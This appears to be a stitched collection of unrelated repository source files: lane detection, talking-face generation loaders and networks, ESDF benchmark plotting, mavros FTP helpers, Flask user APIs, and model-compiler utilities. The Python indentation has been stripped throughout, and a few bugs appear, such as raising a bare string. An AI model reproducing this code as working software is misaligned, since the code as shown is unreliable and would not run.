if print_stages:
cv2.imwrite(".\\output_images\\test%d_stacked.jpg" % count, cv2.cvtColor(stacked, cv2.COLOR_BGR2RGB))
return stacked
#--------------- Main ------------------------------
processVideo = True
# Do calibration (only need to do once)
images = glob.glob(r".\camera_cal\calibration*.jpg")
mtx, dist = doCalibration(images)
# Process Images
images = glob.glob(r".\test_images\test*.jpg")
images.append(r".\test_images\straight_lines1.jpg")
images.append(r".\test_images\straight_lines2.jpg")
count = 0
for img in images:
count += 1
#Undistort
img = cv2.imread(img)
undistorted = cv2.undistort(img,mtx, dist, None, mtx)
cv2.imwrite(".\\output_images\\test%d_undistorted.jpg" % count, undistorted)
print("Processing image %2d" % count, end='\r', flush=True)
processed = doLaneDetection(img,print_stages=True)
print("\nFinished Images")
# Process Video
if processVideo:
images = glob.glob(r".\render\frame*.jpg")
count = 0
for img in images:
count += 1
if count > 1252:
(print("\n# Finished #"))
break
# Undistort
img = cv2.imread(img)
img = cv2.undistort(img, mtx, dist, None, mtx)
# Process
processed = doLaneDetection(img,print_stages=False)
print("Processing frame %2d" % count, end='\r', flush=True)
cv2.imwrite(".\\render\\frameOut%05d.jpg" % count, cv2.cvtColor(processed, cv2.COLOR_BGR2RGB))
# When finished, render video
renderVideoFFMPEG()
``` |
{
"source": "JinxedQAQ/Generating-Talking-Face-with-Controllable-Eye-Movements-by-Disentangled-Blinking-Feature",
"score": 2
} |
#### File: Generating-Talking-Face-with-Controllable-Eye-Movements-by-Disentangled-Blinking-Feature/Dataloader/Test_load_audio.py
```python
from __future__ import print_function, division
import os
import torch
import numpy as np
from torch.utils.data import Dataset, DataLoader
from Options_all import BaseOptions
import cv2
def Test_Outside_Loader(path, A_path, config, require_audio=True, require_video=False):
loader = {}
data_length = config.test_audio_video_length
pair = range(2, 2 + data_length)
im_pth = []
video_block = np.zeros((config.test_audio_video_length,
config.image_size,
config.image_size,
config.image_channel_size))
mfcc_block = np.zeros(( config.test_audio_video_length, 1,
config.mfcc_length,
config.mfcc_width,
))
blinkdata_block = np.zeros((config.test_audio_video_length,
config.blinkdata_width))
crop_x = 2
crop_y = 2
A_image = cv2.imread(A_path)
A_image = cv2.cvtColor(A_image, cv2.COLOR_BGR2RGB)
A_image = A_image.astype(np.float)
A_image = A_image / 255
A_image = cv2.resize(A_image[crop_x:crop_x + config.image_size, crop_y:crop_y + config.image_size],
(config.image_size, config.image_size))
if os.path.isdir(path):
k1 = 0
if require_video:
for image_num in pair:
image_path = os.path.join(path, str(image_num) + '.jpg')
im_pth.append(image_path)
if os.path.exists(image_path):
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image / 255
video_block[k1] = image[crop_x:crop_x + config.image_size, crop_y:crop_y + config.image_size]
else:
print("video_block = 0")
break
k1 += 1
if require_audio:
k4 = 0
for mfcc_num in pair:
# for s in range(-1,2):
mfcc_path = os.path.join(path, str(mfcc_num) + '.bin')
if os.path.exists(mfcc_path):
mfcc = np.fromfile(mfcc_path)
mfcc = mfcc.reshape(20, 12)
mfcc_block[k4, 0, :, :] = mfcc
k4 += 1
else:
raise ("mfccs = 0")
blinkdata_path = os.path.join(path, 'd.txt')
blinkdatas = np.loadtxt(blinkdata_path)
k3hjq = 0
for b_num in pair:
if (config.blinkdata_width-1) % 2 != 0:
print("WIDTH ERROR INIT BLINKDATA!!! Not and odd number. This may cause errors. HJQERR")
b_expand = config.blinkdata_width // 2
#print(blinkdatas[b_num - b_expand:b_num + b_expand + 1])
blinkdata_block[k3hjq] = blinkdatas[b_num - b_expand:b_num + b_expand + 1]
k3hjq += 1
video_block = video_block.transpose((0, 3, 1, 2))
A_image = A_image.transpose((2, 0, 1))
loader['A'] = A_image
if require_video:
loader['B'] = video_block
loader['B_audio'] = mfcc_block
loader['A_path'] = A_path
loader['B_path'] = im_pth
loader['blinkdata'] = blinkdata_block
return loader
class Test_VideoFolder(Dataset):
def __init__(self, root, A_path, config, transform=None, target_transform=None,
loader=Test_Outside_Loader, mode='test'):
self.root = root
self.A_path = A_path
self.transform = transform
self.target_transform = target_transform
self.loader = loader
self.config = config
self.mode = mode
self.vid = self.loader(self.root, self.A_path, config=self.config)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
loader = {}
loader['A'] = self.vid['A']
loader['B_audio'] = self.vid['B_audio'][index:self.config.sequence_length + index, :, :, :]
loader['A_path'] = self.A_path
loader['blinkdata'] = self.vid['blinkdata'][index:self.config.sequence_length + index, :]
return loader
def __len__(self):
return self.config.test_audio_video_length - self.config.sequence_length + 1
```
#### File: Generating-Talking-Face-with-Controllable-Eye-Movements-by-Disentangled-Blinking-Feature/network/mfcc_networks.py
```python
from __future__ import print_function, division
import torch
import torch.nn as nn
class mfcc_encoder(nn.Module):
def __init__(self, norm_layer=nn.BatchNorm2d):
super(mfcc_encoder, self).__init__()
use_bias = norm_layer == nn.InstanceNorm2d
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 3),
stride=(3, 2), padding=(1, 2), bias=use_bias)
self.pool1 = nn.AvgPool2d((2, 2), 2)
self.bn1 = norm_layer(64)
self.conv2 = nn.Conv2d(64, 128, (3, 3), 2, 1, bias=use_bias)
self.pool2 = nn.AvgPool2d(2,2)
self.bn2 = norm_layer(128)
self.conv3 = nn.Conv2d(128, 256, (3, 3), 1, 0, bias=use_bias)
self.bn3 = norm_layer(256)
self.conv4 = nn.Conv2d(256, 512, (2, 2), 1, bias=use_bias)
self.bn5 = norm_layer(512)
self.tanh = nn.Tanh()
def forward(self, x):
net1 = self.conv1(x)
net1 = self.bn1(net1)
net1 = self.relu(net1)
net = self.conv2(net1)
net = self.bn2(net)
net = self.relu(net)
net = self.conv3(net)
net = self.bn3(net)
net = self.relu(net)
net = self.conv4(net)
return net
class mfcc_encoder_alter(nn.Module):
def __init__(self):
super(mfcc_encoder_alter, self).__init__()
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 12), stride=(1,1), padding=0, bias=False)
self.bn1 = nn.BatchNorm1d(64)
self.pool1 = nn.MaxPool2d(1, 3)
self.conv2 = nn.Conv2d(64, 256, (3, 1), 1, (1, 0), bias=False)
self.bn2 = nn.BatchNorm2d(256)
self.pool2 = nn.MaxPool2d(1, 2)
self.conv3 = nn.Conv2d(256, 512, (3, 1), 1, bias=False)
def forward(self, x):
net = self.conv1(x)
net = self.relu(self.bn1(net))
net = self.pool1(net)
net = self.conv2(net)
net = self.relu(self.bn2(net))
net = self.pool2(net)
net = self.conv3(net)
return net
class mfcc_encoder_two(nn.Module):
def __init__(self, opt):
super(mfcc_encoder_two, self).__init__()
self.opt = opt
self.model1 = mfcc_encoder()
self.model2 = mfcc_encoder_alter()
self.fc = nn.Linear(1024, 256)
def _forward(self, x):
net1 = self.model1.forward(x)
net2 = self.model2.forward(x)
net = torch.cat((net1, net2), 1)
net = net.view(-1, 1024)
net = self.fc(net)
return net
def forward(self, x):
x0 = x.view(-1, 1, self.opt.mfcc_length, self.opt.mfcc_width)
net = self._forward(x0)
net = net.view(x.size(0), -1, 256)
return net
``` |
{
"source": "JINXER000/FIESTA",
"score": 3
} |
#### File: FIESTA/launch/plottest.py
```python
import matplotlib.pyplot as plt;
import numpy as np;
import scipy.optimize as opt;
# This is the function we are trying to fit to the data.
def func(x, a, b, c):
return a * np.exp(-b * x) + c
def f_1(x, A, B):
return A * x + B
# Generate some data, you don't have to do this, as you already have your data
# xdata = np.linspace(0, 4, 50)
# y = func(xdata, 2.5, 1.3, 0.5)
# y_noise = 0.2 * np.random.normal(size=xdata.size)
# ydata = y + y_noise
xdata = np.array([16159.2, 17334.2, 16251.4, 22609, 1.38982e+06, 2.00012e+06, 5.02172e+06, 3.61781e+06, 4.3934e+06, 4.81698e+06, 5.81111e+06, 6.67861e+06, 7.482e+06, 9.93535e+06, 1.09539e+07, 1.26584e+07, 1.35077e+07])/7500000
ydata = [4, 5, 5, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7]
# Plot the actual data
plt.plot(xdata, ydata, ".")
x2 = np.array([2758.06, 2955.63, 18154.9, 18190, 15085.7, 1.20055e+06, 864335, 1.84234e+06, 4.87904e+06, 5.29839e+06, 6.7315e+06, 7.61749e+06, 9.17301e+06, 9.87764e+06, 1.11146e+07, 1.25104e+07, 1.37528e+07])/7500000
y2 = [1, 1, 2, 3, 36, 85, 97, 102, 88, 98, 119, 98, 123, 126, 132, 144, 137]
plt.plot(x2, y2, ".", color="g")
# The actual curve fitting happens here
optimizedParameters, pcov = opt.curve_fit(f_1, xdata, ydata)
# Use the optimized parameters to plot the best fit
plt.plot(xdata, f_1(xdata, *optimizedParameters), label="ours")
optimizedParameters2, pcov2 = opt.curve_fit(f_1, x2, y2)
# Use the optimized parameters to plot the best fit
plt.plot(x2, f_1(x2, *optimizedParameters2), label="FIESTA")
plt.title('Mapping speed vs. Environmantal change')
plt.xlabel('Environmental change score')
plt.ylabel('ESDF construction time (ms)')
plt.legend()
# Show the graph
plt.legend()
plt.savefig("changerate.pdf")
plt.show()
``` |
{
"source": "JINXER000/FundamentalSimulatorPX4",
"score": 2
} |
#### File: src/mavros/ftp.py
```python
__all__ = (
'FTPFile',
'open',
'listdir',
'unlink',
'mkdir',
'rmdir',
'rename',
'checksum',
'reset_server'
)
import os
import rospy
import mavros
from std_srvs.srv import Empty
from mavros_msgs.msg import FileEntry
from mavros_msgs.srv import FileOpen, FileClose, FileRead, FileList, FileOpenRequest, \
FileMakeDir, FileRemoveDir, FileRemove, FileWrite, FileTruncate, FileRename, \
FileChecksum
def _get_proxy(service, type):
return rospy.ServiceProxy(mavros.get_topic('ftp', service), type)
def _check_raise_errno(ret):
if not ret.success:
raise IOError(ret.r_errno, os.strerror(ret.r_errno))
class FTPFile(object):
"""
FCU file object.
Note that current PX4 firmware only support two connections simultaneously.
"""
def __init__(self, name, mode):
self.name = None
self.mode = mode
self.open(name, mode)
def __del__(self):
self.close()
def open(self, path, mode):
"""
Supported modes:
- 'w': write binary
- 'r': read binary
- 'cw': create excl & write
"""
if mode == 'w' or mode == 'wb':
m = FileOpenRequest.MODE_WRITE
elif mode == 'r' or mode == 'rb':
m = FileOpenRequest.MODE_READ
elif mode == 'cw':
m = FileOpenRequest.MODE_CREATE
else:
raise ValueError("Unknown open mode: {}".format(m))
open_ = _get_proxy('open', FileOpen)
try:
ret = open_(file_path=path, mode=m)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
self._read = _get_proxy('read', FileRead)
self._write = _get_proxy('write', FileWrite)
self.name = path
self.mode = mode
self.size = ret.size
self.offset = 0
def close(self):
if self.closed:
return
close_ = _get_proxy('close', FileClose)
try:
ret = close_(file_path=self.name)
except rospy.ServiceException as ex:
raise IOError(str(ex))
self.name = None
_check_raise_errno(ret)
def read(self, size=1):
try:
ret = self._read(file_path=self.name, offset=self.offset, size=size)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
self.offset += len(ret.data)
return bytearray(ret.data)
def write(self, bin_data):
data_len = len(bin_data)
try:
ret = self._write(file_path=self.name, offset=self.offset, data=bin_data)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
self.offset += data_len
if self.offset > self.size:
self.size = self.offset
def tell(self):
return self.offset
def seek(self, offset, whence=os.SEEK_SET):
if whence is os.SEEK_SET:
self.offset = offset
elif whence is os.SEEK_END:
self.offset = offset + self.size
elif whence is os.SEEK_CUR:
self.offset += offset
else:
raise ValueError("Unknown whence")
def truncate(self, size=0):
truncate_ = _get_proxy('truncate', FileTruncate)
try:
ret = truncate_(file_path=self.name, length=size)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
@property
def closed(self):
return self.name is None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def open(path, mode):
"""Open file on FCU"""
return FTPFile(path, mode)
def listdir(path):
"""List directory :path: contents"""
try:
list_ = _get_proxy('list', FileList)
ret = list_(dir_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
return ret.list
def unlink(path):
"""Remove :path: file"""
remove = _get_proxy('remove', FileRemove)
try:
ret = remove(file_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def mkdir(path):
"""Create directory :path:"""
mkdir_ = _get_proxy('mkdir', FileMakeDir)
try:
ret = mkdir_(dir_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def rmdir(path):
"""Remove directory :path:"""
rmdir_ = _get_proxy('rmdir', FileRemoveDir)
try:
ret = rmdir_(dir_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def rename(old_path, new_path):
"""Rename :old_path: to :new_path:"""
rename_ = _get_proxy('rename', FileRename)
try:
ret = rename_(old_path=old_path, new_path=new_path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
def checksum(path):
"""Calculate CRC32 for :path:"""
checksum_ = _get_proxy('checksum', FileChecksum)
try:
ret = checksum_(file_path=path)
except rospy.ServiceException as ex:
raise IOError(str(ex))
_check_raise_errno(ret)
return ret.crc32
def reset_server():
reset = _get_proxy('reset', Empty)
try:
reset()
except rospy.ServiceException as ex:
raise IOError(str(ex))
```
#### File: src/mavros/setpoint.py
```python
import rospy
import mavros
from std_msgs.msg import Header, Float64
from geometry_msgs.msg import TwistStamped, PoseStamped, PoseWithCovarianceStamped, \
Vector3, Vector3Stamped, Point, Quaternion
def get_pub_accel_accel(**kvargs):
"""
Returns publisher for :setpoint_accel: plugin, :accel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_accel', 'accel'), Vector3Stamped, **kvargs)
def get_pub_attitude_cmd_vel(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :cmd_vel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_attitude', 'cmd_vel'), PoseStamped, **kvargs)
def get_pub_attitude_throttle(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :cmd_vel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_attitude', 'att_throttle'), Float64, **kvargs)
def get_pub_attitude_pose(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :attituse: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_attitude', 'attitude'), PoseStamped, **kvargs)
def get_pub_attitude_posecov(**kvargs):
"""
Returns publisher for :setpoint_attitude: plugin, :attituse: topic (with covariance)
"""
raise DeprecationWarning("PoseWithCovarianceStamped subscriber removed.")
def get_pub_position_local(**kvargs):
"""
Returns publisher for :setpoint_position: plugin, :local: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_position', 'local'), PoseStamped, **kvargs)
def get_pub_velocity_cmd_vel(**kvargs):
"""
Returns publisher for :setpoint_velocity: plugin, :cmd_vel: topic
"""
return rospy.Publisher(mavros.get_topic('setpoint_velocity', 'cmd_vel'), TwistStamped, **kvargs)
``` |
{
"source": "Jinxes/pipe",
"score": 2
} |
#### File: session/api/signout.py
```python
from flask.views import View
from flask import Response, request, jsonify
from flask_cors import cross_origin
class Controller(View):
methods = ['DELETE']
@cross_origin()
def dispatch_request(self):
return Response(status=205)
```
#### File: user/api/addition.py
```python
from flask.views import View
from flask import request, jsonify
from ports.user.service.user import UserService
from ports.user.service.auth import AuthService
from ports.user.model.user_form import UserForm
from ports.user.model.info_form import InfoForm
from flask_jwt import current_identity, jwt_required
from boot.jwt_util import jwt_optional
from flask_apispec import use_kwargs, marshal_with
from ports.user.user_schema import user_schema
from werkzeug.datastructures import MultiDict
class Controller(View):
methods = ['POST']
def __init__(self):
self.userService = UserService()
self.authService = AuthService()
@jwt_optional()
def dispatch_request(self):
user_form = UserForm(MultiDict(request.json))
if user_form.validate():
user = user_form.create()
if user:
info_form = InfoForm()
info = info_form.init(user.id)
if info:
token = self.authService.make_auth_token(user)
return jsonify(dict(token=token.decode())), 201
return jsonify({'errors': {'_system': 'system busy1'}}), 500
else:
return jsonify({'errors': {'_system': 'system busy2'}}), 500
else:
return jsonify({'errors': user_form.errors}), 422
```
#### File: user/api/repemail.py
```python
from flask import request, Response
from flask.views import View
from ports.user.service.user import UserService
from flask_jwt import current_identity, jwt_required
class Controller(View):
methods = ['GET']
def __init__(self):
self.userService = UserService()
@jwt_required()
def dispatch_request(self):
user = self.userService.findByEmail(request.args.get('email', None))
if user:
if user.id != current_identity.id:
return Response(status=200)
return Response(status=404)
```
#### File: user/model/info.py
```python
from boot.extensions import db
from flask import current_app
from datetime import datetime
from sqlalchemy.dialects.mysql import INTEGER, VARCHAR, TINYINT, DATETIME, TEXT
class UserInfo(db.Model):
id = db.Column(INTEGER(unsigned=True), primary_key=True)
sign = db.Column(TEXT(), nullable=False, default='')
intro = db.Column(TEXT(), nullable=False, default='')
address = db.Column(VARCHAR(length=255), nullable=False, default='')
birthday = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
avatar = db.Column(VARCHAR(length=255), nullable=False, default='')
state = db.Column(TINYINT(), nullable=False, default=1)
user_id = db.Column(INTEGER(unsigned=True), db.ForeignKey('user.id'), nullable=False)
def __str__(self):
return '<UserInfo {0}>'.format(self.user.id)
```
#### File: user/model/user.py
```python
from flask import current_app
from boot.extensions import db
from datetime import datetime
from sqlalchemy.dialects.mysql import INTEGER, VARCHAR, TINYINT, DATETIME
from .info import UserInfo
from ports.blog.model.blog import Blog
class User(db.Model):
id = db.Column(INTEGER(unsigned=True), primary_key=True)
email = db.Column(VARCHAR(length=128), unique=True, nullable=False)
nickname = db.Column(VARCHAR(length=128), nullable=False)
password = db.Column(VARCHAR(length=255), nullable=False)
gender = db.Column(TINYINT(), nullable=False, default=0)
state = db.Column(TINYINT(), nullable=False, default=1)
active = db.Column(TINYINT(), nullable=False, default=0)
manager = db.Column(TINYINT(), nullable=False, default=0)
create_time = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
info = db.relationship(UserInfo, uselist=False, backref='user', lazy=True)
blogs = db.relationship(Blog, uselist=True, backref='user', lazy=True)
def __str__(self):
return '<User {0}>'.format(self.id)
```
#### File: user/service/user.py
```python
from boot.singleton import singleton
from ports.user.model.user import User
@singleton
class UserService:
STATE_ON = 1
STATE_OFF = 0
_curent_user = None
def email_exist(self, email):
'''
确认电子邮件是否有重复
:param email: string
:return: bool
'''
num = User.query.filter_by(email=email).count()
return True if num > 0 else False
def findById(self, id):
'''
根据 id 定位单个用户
:param id: User.id
:return: User
'''
user = User.query.filter_by(id=id, state=self.STATE_ON).first()
return user
def findByEmail(self, email):
'''
根据 email 定位单个用户
:param id: User.id
:return: User
'''
user = User.query.filter_by(email=email, state=self.STATE_ON).first()
return user
def set_curent_user(self, user):
'''
设置当前用户
:param user: User
:return: None
'''
self._curent_user = user
def get_curent_user(self):
'''
根据当前 token 中的用户标识定位单个用户
使用前必须调用闭包 authorization.dependent
或调用 self.set_curent_user 方法指定当前用户
:return: User
'''
return self._curent_user
``` |
{
"source": "JinXiaozhao/Adlik",
"score": 2
} |
#### File: model_compiler/models/data_type.py
```python
import enum
from enum import Enum
from onnx import TensorProto as OnnxTensorProto
from tensorflow.core.framework.types_pb2 import DataType as TfDataType # pylint: disable=no-name-in-module
_ONNX_DATA_TYPE = OnnxTensorProto.DataType # pylint: disable=no-member
class DataType(Enum):
# Boolean values.
BOOL = enum.auto()
# Integer values.
INT8 = enum.auto()
UINT8 = enum.auto()
INT16 = enum.auto()
UINT16 = enum.auto()
INT32 = enum.auto()
UINT32 = enum.auto()
INT64 = enum.auto()
UINT64 = enum.auto()
# Floating number values.
FLOAT16 = enum.auto()
BFLOAT16 = enum.auto()
FLOAT = enum.auto()
DOUBLE = enum.auto()
# Complex values.
COMPLEX64 = enum.auto()
COMPLEX128 = enum.auto()
# String values.
STRING = enum.auto()
@staticmethod
def from_tf_data_type(data_type: int):
if data_type == TfDataType.DT_HALF:
return DataType.FLOAT16
return DataType[TfDataType.Name(data_type)[len('DT_'):]]
def to_tf_data_type(self) -> int:
if self == DataType.FLOAT16:
return TfDataType.DT_HALF
return TfDataType.Value(f'DT_{self.name}')
@staticmethod
def from_onnx_data_type(data_type: int):
return DataType[_ONNX_DATA_TYPE.Name(data_type)]
def to_onnx_data_type(self) -> int:
return _ONNX_DATA_TYPE.Value(self.name)
@staticmethod
def from_tensorrt_data_type(data_type):
import tensorrt # pylint: disable=import-outside-toplevel
if data_type == tensorrt.DataType.HALF:
return DataType.FLOAT16
return DataType[data_type.name]
def to_tensorrt_data_type(self):
import tensorrt # pylint: disable=import-outside-toplevel
if self == DataType.FLOAT16:
return tensorrt.DataType.HALF
return getattr(tensorrt.DataType, self.name)
@staticmethod
def from_openvino_data_type(data_type):
precision_map = {
'FP32': DataType.FLOAT,
'FP16': DataType.FLOAT16,
'I64': DataType.INT64,
'I32': DataType.INT32,
'I8': DataType.INT8,
'U8': DataType.UINT8,
'U1': DataType.UINT8,
'BOOL': DataType.BOOL,
'BIN': DataType.UINT8,
}
return precision_map[data_type]
@staticmethod
def from_caffe_data_type(type_str):
return DataType[type_str.upper()]
@staticmethod
def from_torch_data_type(type_str):
import torch # pylint: disable=import-outside-toplevel
torch_data_type_map = {
'FLOAT': torch.float,
'DOUBLE': torch.double,
'COMPLEX64': torch.complex64,
'COMPLEX128': torch.complex128,
'FLOAT16': torch.float16,
'BFLOAT16': torch.bfloat16,
'UINT8': torch.uint8,
'INT8': torch.int8,
'INT16': torch.int16,
'INT32': torch.int32,
'INT64': torch.int64,
'BOOL': torch.bool
}
return torch_data_type_map[type_str.upper()]
```
#### File: model_compiler/tvm_utils/__init__.py
```python
from .schedule_search_x86 import CpuSearch
class Compiler:
def __init__(self, relay_mod, params, input_shape) -> None:
self.mod = relay_mod
self.params = params
self.input_shape = input_shape
self.strategy = None
self.schedule_file = None
def set_strategy(self, strategy):
self.strategy = strategy
def search_schedule(self):
self.schedule_file = self.strategy.search(self.mod, self.params, self.input_shape)
def compile(self):
return self.strategy.compile(self.mod, self.params, self.schedule_file)
def compile_relay(model, params, config, shape_dict):
compiler = Compiler(model, params, shape_dict)
if config.target.startswith('llvm'):
compiler.set_strategy(CpuSearch(config.target))
elif config.target == 'arm-cpu':
raise NotImplementedError('Arm compile not supported yet')
elif config.target == 'cuda':
raise NotImplementedError('CUDA compile not supported yet')
else:
raise NameError(f'Not supported target name: "{config.target}"')
if config.need_search_schedule:
compiler.search_schedule()
return compiler.compile()
```
#### File: model_compiler/compilers/test_paddle_model_file_to_onnx_model.py
```python
from tempfile import TemporaryDirectory
from unittest import TestCase
import os
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
from paddle.static import InputSpec
import model_compiler.compilers.paddle_model_file_to_onnx_model as compiler
from model_compiler.compilers.paddle_model_file_to_onnx_model import Config, DataFormat
from model_compiler.models.sources.paddle_model_file import PaddlePaddleModelFile
class _RandomDataset(paddle.io.Dataset):
def __init__(self, num_samples): # pylint: disable=super-init-not-called
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([784]).astype('float32') # pylint: disable=no-member
label = np.random.randint(0, 9, (1,)).astype('int64')
return image, label
def __len__(self):
return self.num_samples
class _LinearNet(nn.Layer):
def __init__(self):
super().__init__()
self._linear = nn.Linear(784, 10)
def forward(self, inputs): # pylint: disable=arguments-differ
return self._linear(inputs)
class ConfigTestCase(TestCase):
def test_from_json(self):
self.assertEqual(Config.from_json({'input_formats': ['channels_first'],
'model_filename': 'model',
'params_filename': 'params',
'opset_version': 9,
'enable_onnx_checker': True}),
Config(input_formats=[DataFormat.CHANNELS_FIRST],
model_filename='model',
params_filename='params',
opset_version=9,
enable_onnx_checker=True))
def test_from_env(self):
self.assertEqual(Config.from_env({'INPUT_FORMATS': 'channels_last',
'MODEL_FILENAME': None,
'PARAMS_FILENAME': None,
'OPSET_VERSION': 9,
'ENABLE_ONNX_CHECKER': True}),
Config(input_formats=[DataFormat.CHANNELS_LAST],
model_filename=None,
params_filename=None,
opset_version=9,
enable_onnx_checker=True))
def get_paddle_model(model_path):
def train(layer, loader, loss_fn, optimizer):
for _ in range(1):
for _, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
optimizer.step()
optimizer.clear_grad()
model_layer = _LinearNet()
loss_func = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=model_layer.parameters())
dataset = _RandomDataset(64)
data_loader = paddle.io.DataLoader(dataset,
batch_size=16,
shuffle=True,
drop_last=True,
num_workers=2)
train(model_layer, data_loader, loss_func, adam)
paddle.jit.save(
layer=model_layer,
path=os.path.join(model_path, 'model'),
input_spec=[InputSpec(shape=[None, 784], dtype='float32')])
class CompileSourceTestCase(TestCase):
def test_compile(self):
with TemporaryDirectory() as model_dir:
get_paddle_model(model_dir)
compiled = compiler.compile_source(PaddlePaddleModelFile(model_dir),
Config(input_formats=[DataFormat.CHANNELS_LAST],
model_filename=os.path.join(model_dir, 'model.pdmodel'),
params_filename=os.path.join(model_dir, 'model.pdiparams'),
opset_version=10,
enable_onnx_checker=True))
graph = compiled.model_proto.graph
initializers = {initializer.name for initializer in graph.initializer}
input_name = [input_spec.name for input_spec in graph.input if input_spec.name not in initializers]
self.assertEqual(input_name, ['inputs'])
self.assertEqual(compiled.input_data_formats, [DataFormat.CHANNELS_LAST])
```
#### File: models/sources/test_mxnet_model_file.py
```python
from unittest import TestCase
from model_compiler.models.sources.mxnet_model_file import MxnetModelFile
class ONNXModelFileTestCase(TestCase):
def test_from_json_minimal(self):
config = MxnetModelFile.from_json({'input_model': 'foo'})
self.assertEqual(config.model_path, 'foo')
def test_from_env(self):
config = MxnetModelFile.from_env({'MXNET_PATH': 'model'})
self.assertEqual(config.model_path, 'model')
``` |
{
"source": "jinxia-shanbay-group/shanbay-api",
"score": 3
} |
#### File: shanbay-api/shanbay/people.py
```python
from .common import *
class People:
def __init__(self):
...
@property
def name(self):
"""昵称"""
...
return
def avator(self):
"""头像地址"""
...
def readbooks(self):
"""扇贝读书"""
...
def stats(self):
"""成长曲线"""
...
def checkin(self):
"""打卡记录"""
...
```
#### File: shanbay-api/shanbay/team.py
```python
import requests
class Team:
def __init__(self):
...
def get_url(self):
...
def get_id(self):
...
def get_forum_id(self):
...
def get_info(self):
...
def get_members(self):
...
def update_limit(self):
...
def dismiss(self):
...
def new_thread(self):
...
``` |
{
"source": "jinxia-shanbay-group/zhao-hua-xi-shi",
"score": 2
} |
#### File: jinxia-shanbay-group/zhao-hua-xi-shi/test_all.py
```python
from shanbay import Shanbay
from spider import Spider
from config import USERNAME
from config import PASSWORD
from task import Agent
def test_shanbay():
sb = Shanbay(USERNAME, PASSWORD)
sb.login()
print(sb.user_id)
print(sb.team_id)
print(sb.forum_id)
print(sb.get_thread("3128002"))
def test_spider():
sp = Spider()
print(sp.get_quote())
print(sp.get_joke())
print(sp.get_pic())
def test_task():
"""只能测试部分函数"""
shanbay = Shanbay(USERNAME, PASSWORD)
spider = Spider()
agent = Agent(shanbay, spider)
agent.thread_id = "3138247"
agent.add_foot()
result = agent.online_check()
agent.local_record(result)
``` |
{
"source": "jinxinfeng/Basic-knowledge",
"score": 4
} |
#### File: JavaScript-Important knowledge points/pytest/1.py
```python
class Good:
def __init__(self,gid,num:int) -> None:
self.gid = gid
self.num=num
pass
class Order(Good):
def __init__(self,id:int,discount:float) -> None:
self.id = id
self.discount =discount
def setDiscount(self, discount: float) -> None:
self.discount = discount
def getDiscount(self) -> float:
return self.discount
class Customer(Order,Good):
def __init__(self,rank:int,num:int,order:Order) -> None:
self.rank = 0 #用户初始积分
self.num=0 #用户的初始订单数
self.order = [] #表示订单列表
def setRank(self, rank: int)-> None:
self.rank = rank
def getRank(self) -> float:
return self.rank
def setNum (self,num: int) -> None:
self.num = num
def getNum(self) -> int:
return self.num
def setOrder(self,order: Order) -> None:
self.order = order
def getOrder(self) -> Order:
return self.order;
def OrderHandler1(self) -> float:
if(self.rank >= 1000):
self.setDiscount(0.95)
def OrderHandler2(self) -> float:
for o in self.getOrder():
if(o.gid == self.gid and self.num >= 20):
self.setDiscount(0.9)
def OrderHandler3(self) -> float:
for o in self.getOrder():
if(o.gid != self.gid and self.num >=10):
self.setDiscount(0.93)
class Cart(Customer,Good):
def __init__(self, rank: int, num: int, order: Order,maxDiscount: float) -> None:
super().__init__(rank, num, order)
self.maxDiscount = 0.0
def OrderHandler4(self) -> float:
#计算积分,并返回最大折扣
if(self.rank>=1000):
self.OrderHandler1()
self.maxDiscount += self.getNum()*self.getDiscount()
for o in self.order:
if(o.id== self.id and self.num>=20):
self.OrderHandler2()
self.maxDiscount += self.getNum()*self.getDiscount()
elif(o.id==self.id):
self.OrderHandler3()
self.maxDiscount+=self.getNum()*self.getDiscount()
else:
return self.maxDiscount
``` |
{
"source": "jinxing64/flink-ai-extended",
"score": 2
} |
#### File: ai_flow/plugins/platform.py
```python
from typing import Text
import logging
from ai_flow.util.json_utils import Jsonable
from ai_flow.deployer.listener import register_job_status_listener, BaseJobStatusListener
from ai_flow.workflow.job_handler import BaseJobHandler
AbstractJobHandler = BaseJobHandler
AbstractJobStatusListener = BaseJobStatusListener
class AbstractPlatform(Jsonable):
"""
ai flow job must run on one platform, such as local k8s etc.
"""
def __init__(self) -> None:
super().__init__()
@staticmethod
def platform() -> Text:
"""
:return platform name:
"""
raise NotImplementedError("not implement platform")
@staticmethod
def job_status_listener() -> type(AbstractJobStatusListener):
"""
:return AbstractJobStatusListener class:
"""
raise NotImplementedError("not implement AbstractJobStatusListener")
